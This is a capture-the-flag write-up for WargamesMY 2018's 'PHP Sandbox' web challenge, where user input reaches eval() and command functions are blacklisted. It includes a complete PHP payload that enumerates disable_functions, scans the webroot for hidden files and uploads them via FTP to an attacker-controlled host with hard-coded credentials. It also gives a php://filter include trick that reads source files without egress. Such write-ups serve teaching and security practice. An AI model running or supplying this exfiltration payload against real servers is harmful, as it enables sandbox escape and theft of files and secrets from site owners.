WargamesMY CTF 2018: PHP Sandbox

P/S: We forgot to take screenshots for the writeup on this one; luckily there was still Burp history available.

Viewing the page source, we found <!-- source code ./source.txt --> in an HTML comment. Viewing source.txt we got:

[screenshot: source.txt]

Basically it is a single web page and form that takes user input in the parameter code and passes it straight into the eval() function.

Great! Never thought a WGMY web challenge would be this ez pz. Let's try to get RCE..

[screenshot: RCE attempt]

Snap! Never underestimate the troll level of the WGMY challenge authors. All command execution functions are disabled. var_dump(ini_get('disable_functions')); reveals all the disabled functions:

So that explains why the challenge is named PHP Sandbox.

Later we found that scandir() is still usable, and it revealed the target flag file .supers3cr37file.php in the same www directory.

[screenshot: scandir() output]

Most of the file read/view functions are also disabled (maybe not all; we just couldn't think of any others at the time). Later we found that the FTP functions are usable. The idea is to transfer the flag file back to us via FTP, so we ran an FTP server on our box.

Submit the above code.

[screenshot: FTP exfiltration]

The target flag file was successfully transferred to our box, and finally:

$ cat flagphpsandbox.txt
<?php /*$flag = 'wgmy{func_bl4ck1ist_1z_s0_b4d}';*/ ?>

Flag : wgmy{func_bl4ck1ist_1z_s0_b4d}
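The chain described above (enumerate disable_functions, scandir() the webroot for dotfiles, push the flag file out over FTP) as one payload. This is an added example, not the challenge source or the payload we actually submitted; the attacker host, FTP credentials and webroot path are assumptions. Everything below runs inside the sandbox's eval(), so when pasting it into the code parameter the opening <?php tag is dropped. Note that requesting .supers3cr37file.php over HTTP would return nothing, because the flag sits inside a PHP comment; the raw source has to be read.

```php
<?php
// Added example (not the challenge's code). Assumed values are marked.
$attackerHost = '203.0.113.10';   // assumed: our FTP server (TEST-NET-3 address)
$attackerUser = 'anonymous';      // assumed
$attackerPass = 'anon@';          // assumed
$webroot      = '/var/www/html';  // assumed: directory scandir() showed the flag in

// Step 1: read the blacklist the sandbox enforces. disable_functions is a
// comma-separated list; a blacklisted function still passes function_exists(),
// so "exists" is not the same as "callable" here.
function disabledFunctions(): array {
    $raw = (string) ini_get('disable_functions');
    return array_values(array_filter(array_map('trim', explode(',', $raw))));
}

function isUsable(string $fn, array $disabled): bool {
    return function_exists($fn) && !in_array($fn, $disabled, true);
}

$disabled = disabledFunctions();
$probe = [
    // command execution
    'system', 'exec', 'shell_exec', 'passthru', 'proc_open', 'popen',
    // file read / view
    'file_get_contents', 'readfile', 'fopen', 'file', 'show_source', 'highlight_file',
    // listing and transfer primitives that survived in the challenge
    'scandir', 'glob', 'ftp_connect', 'ftp_login', 'ftp_put',
];
foreach ($probe as $fn) {
    printf("%-18s %s\n", $fn, isUsable($fn, $disabled) ? 'usable' : 'DISABLED');
}

// Step 2: list the webroot. scandir() returns dotfiles too, which is how the
// hidden .supers3cr37file.php shows up; keep only hidden entries.
$entries = scandir($webroot);
if ($entries === false) {
    exit("scandir() failed\n");
}
$targets = array_values(array_filter($entries, function (string $e): bool {
    return $e !== '.' && $e !== '..' && $e[0] === '.';
}));
echo "hidden files: " . implode(', ', $targets) . "\n";

// Step 3: push each target to our FTP server. ftp_put() opens and reads the
// local file internally, so none of the blacklisted read functions are called
// from the payload. Passive mode, since the sandbox host most likely cannot
// accept inbound data connections.
$ftp = @ftp_connect($attackerHost, 21, 10);
if ($ftp === false) {
    exit("ftp_connect() failed\n");
}
if (!ftp_login($ftp, $attackerUser, $attackerPass)) {
    exit("ftp_login() failed\n");
}
ftp_pasv($ftp, true);
foreach ($targets as $name) {
    $local  = $webroot . '/' . $name;
    $remote = 'flag_' . ltrim($name, '.') . '.txt';   // e.g. flag_supers3cr37file.php.txt
    $ok = ftp_put($ftp, $remote, $local, FTP_BINARY);
    printf("%s -> %s: %s\n", $local, $remote, $ok ? 'sent' : 'failed');
}
ftp_close($ftp);
```

The flag name says it all: disable_functions is a blacklist of internal function names, so it never covers language constructs or stream wrappers. With eval() available, include 'php://filter/convert.base64-encode/resource=.supers3cr37file.php'; would have printed the base64 of the source with no network egress at all; the FTP route used here is just the first usable primitive we happened to find.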

References: PHP scandir() function
Read all writeups: WargamesMY CTF 2018 Writeup